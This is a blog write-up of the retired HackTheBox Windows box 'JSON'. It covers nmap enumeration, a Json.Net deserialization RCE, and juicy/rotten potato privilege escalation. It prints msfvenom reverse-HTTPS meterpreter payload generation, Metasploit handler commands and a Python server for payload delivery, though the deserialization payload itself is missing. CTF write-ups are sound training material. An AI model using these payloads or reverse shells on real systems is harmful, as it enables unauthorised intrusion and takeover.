Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - JSON
|htbmachinesretired|

Summary

JSON,a Windows box created by HackTheBox user Cyb3rb0b, was an overall easy difficulty box. The initial foothold was about finding the json de-serialization issue in ASP .net and getting an RCE with that and using that to get the user. Privilege Escalation was much more easier checking if the box was vurnable to juciy/rotten potato and we find it is and using that to get Root.

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Nmap 7.80 scan initiated Mon Dec  2 12:19:22 2019 as: nmap -sC -sV -oN nmap/json 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.14s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:26:f4 (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-12-02T21:20:46
|_  start_date: 2019-12-02T16:43:11

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec  2 12:21:00 2019 -- 1 IP address (1 host up) scanned in 98.70 seconds

Viewing and intercepting all the requests from the website we see /api/account to be sending Bearer token which is just the base64 encoded json containing the user details.

when we pass any other base64 encoded string we get an error stating Cannot deserialize Json.Net Object.

Show me the Json.Net component, that component have a public vulnerability.

I created a msf payload to be uploaded using

1
$ msfvenom -p windows/meterpreter/reverse_https lhost=10.10.X.X lport=443 -f exe > /root/Desktop/yolo.exe

and setup the handler to capture the session in msf console with

1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 10.10.X.X
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

And have a python server to server the payload

1
2
python -m SimpleHTTPServer 80

We then upload our payload with.

and see we were successfully upload the payload to the box as we got a GET request from the box.

by modifying the above payload to execute the uploaded payload we can get the reverse connection on our msfconsole and we see we can grab the user.txt

Privilege Escalation

Checking if the box is vulnerable to rotten/juciy potato using ms16_075_reflection_juicy, we see it is vulnerable.

Using that we can get a new session as NT Authority/System

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/json/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxeasywindowsdeserializationrotten-potatojuicy-potato